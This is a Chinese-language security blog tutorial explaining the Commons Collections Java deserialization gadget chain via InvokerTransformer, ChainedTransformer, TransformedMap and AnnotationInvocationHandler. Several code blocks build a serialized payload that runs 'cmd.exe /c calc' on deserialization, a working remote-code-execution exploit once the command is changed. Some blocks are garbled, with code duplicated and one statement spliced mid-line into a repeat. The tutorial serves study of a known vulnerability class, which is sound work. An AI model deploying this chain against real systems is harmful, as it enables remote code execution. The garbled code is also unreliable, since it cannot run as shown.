![Java-Deserialization-Chapter-Ⅲ]()
Java-Deserialization-Chapter-Ⅲ
序
经过一个多月的忙碌,终于是有时间来更一下此系列的文章了,本文中会涉及到java反射和动态代理,如果你对相关不了解,建议先去学习下相关知识
CommonsCollections
Commons Collections包为Java标准的Collections API提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。
Transformer是一个接口,提供一个transform方法由实现类决定具体的转换逻辑
![image-20230530104453624]()
在Transformer实现类中,我们主要来看一下InvokeTransformer和ChainedTransformer
首先来看一下构造函数,Invoketransformer共有两个构造函数
![image-20230530110459787]()
其中第一个只需要传入一个String类型的methodName,另一个除需传入methodName外,还需要指定方法的参数类型以及具体的参数值
接下来看一下实现类的transform具体实现
![image-20230530105322165]()
在transform中在拿到传入的object后,利用反射调用自身实例化时传入的方法,并将结果返回
到这里InvokeTransformer的作用我们就大致了解了,当我们实例化一个InvokeTransformer时传入一个要调用的方法名以及它的参数类型的具体的参数值
随后在调用transform时指定一下方法的调用对象,InvokeTransformer会自动利用反射去调用相关方法
如下利用Invoketransformer完成调用Runtime.getRuntime().exec("calc")
1
2
3
4
5
6
7
8
9
10
|
Transformer transformer = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});
|
![image-20230530110215777]()
同样ChainedTransformer也是Transformer的一个实现类
![image-20230530135259990]()
它的构造函数需要我们传入一个Transformer类型的数组
接着我们来看下transformer实现
![image-20230530135357161]()
通过实现不难看出在调用 ChainedTransformer 的 transform 方法时,会循环数组,依次调用 Transformer 数
组中每个 Transformer 的 transform 方法,并将执行的结果传递给下一个 Transformer,完成一个链式的调用
有了上面的ChainedTransformer我们现在可以使用链式调用完成命令执行,接下来就需要找一个在对象操作时触发我们的ChainedTransformer调用的桥梁-TransformedMap
![image-20230530140323100]()
从声明上不难看出,TransformedMap继承自AbstractInputCheckedMapDecorator作为装饰器使用,可以理解为Map提供增强功能
单从代码上可能有点不好理解,看下面的类图就一目了然了
![image-20230530140931695]()
当我们用TransformedMap装饰一个map,并进行put时
![image-20230530141254071]()
TransformedMap将会自动每个元素的transformer方法,这也就和上面ChainedTransformer衔接起来了
![image-20230530141357828]()
同样我们使用TransformedMap并结合ChainedTransformer完成调用Runtime.GetRuntime().exec("calc")
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"cmd.exe /c calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<String,Object> hashMap = new HashMap<>();
Map map = TransformedMap.decorate(hashMap,chainedTransformer,null);
map.put("S0cke3t",
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"cmd.exe /c calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<String,Object> hashMap = new HashMap<>();
Map map = TransformedMap.decorate(hashMap,chainedTransformer,null);
map.put("S0cke3t",1);
|
![image-20230530142219177]()
AnnotationInvocationHandler
到目前为止我们找到了完成反序列化漏洞的两个关键步骤执行点和利用链,接下来还需要一个触发点也就是重写了readObject的类来将整个过程串起来
本节内容涉及到java动态代理的一些内容和特性,不了解的朋友可以先去学习一下动态代理基础知识
AnnotationInvocationHandlerJDK原生类,用于注解形式的动态代理
先从readObject看起
![image-20230530143928771]()
首先readObject通过getInstance获取到type对应的注解类型,而要type的条件在构造函数中也有要求
![image-20230530144620094]()
type必须是一个注解,有且只有一个父接口并且是Annotation,只有满足这些条件type和memberValue才会被赋值
回到readObject
在拿到注解类型后调用类型的memberTypes获取到可注解可设置的值
![image-20230530145151855]()
随后使用while循环这个map并设置其中的值,但在设置值之前有一个条件
memberValues中的值和获取到的注解类型中的值存在相同的值,并且这个值不是ExceptionProxy的实例也不能是memberValues的实例
![image-20230530150752285]()
到这里我们整个过程就串起来了
整理一下思路
首先我们需要一个AnnotationInvocationHandler根据构造函数需要传入一个注解类一个Map,并且根据上面赋值要求我们Map中的key要和注解类中有同样的值
根据这个思路可以找到很多可以使用的注解类,比如Target,Resource,Generated等,笔者这里使用Resource的name属性
![image-20230530153408457]()
之后将这个map使用TransformedMap进行封装,使用TransformedMap进行修饰
最后就是上面讲到的利用InvokeTransformer完成链式调用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| Map<Object,Object> hashmap = new HashMap<Object,Object>();
hashmap.put("name", 2);
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"cmd.exe /c calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map transformedMap = TransformedMap.decorate(hashmap,null,chainedTransformer);
Class<?> clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> constructor = clazz.getDeclaredConstructor(Class.class, Map.class);
constructor.setAccessible(true);
InvocationHandler handler = (InvocationHandler) constructor.newInstance(Resource.class,transformedMap);
ByteArrayOutputStream exp=new ByteArrayOutputStream();
ObjectOutputStream oos=new ObjectOutputStream(exp);
oos.writeObject(handler);
oos.flush();
oos.close();
ByteArrayInputStream out=new ByteArrayInputStream(exp.toByteArray());
ObjectInputStream ois=new Map<Object,Object> hashmap = new HashMap<Object,Object>();
hashmap.put("name", 2);
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"cmd.exe /c calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map transformedMap = TransformedMap.decorate(hashmap,null,chainedTransformer);
Class<?> clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> constructor = clazz.getDeclaredConstructor(Class.class, Map.class);
constructor.setAccessible(true);
InvocationHandler handler = (InvocationHandler) constructor.newInstance(Resource.class,transformedMap);
ByteArrayOutputStream exp=new ByteArrayOutputStream();
ObjectOutputStream oos=new ObjectOutputStream(exp);
oos.writeObject(handler);
oos.flush();
oos.close();
ByteArrayInputStream out=new ByteArrayInputStream(exp.toByteArray());
ObjectInputStream ois=new ObjectInputStream(out);
Object obj=(Object) ois.readObject();
|
![image-20230530154001010]()
当然除了使用TransformedMap还可以使用LazyMap做为触发条件,其中涉及到的操作会比TransformedMap稍微复杂一点。这部分内容有时间再补充
That’s all
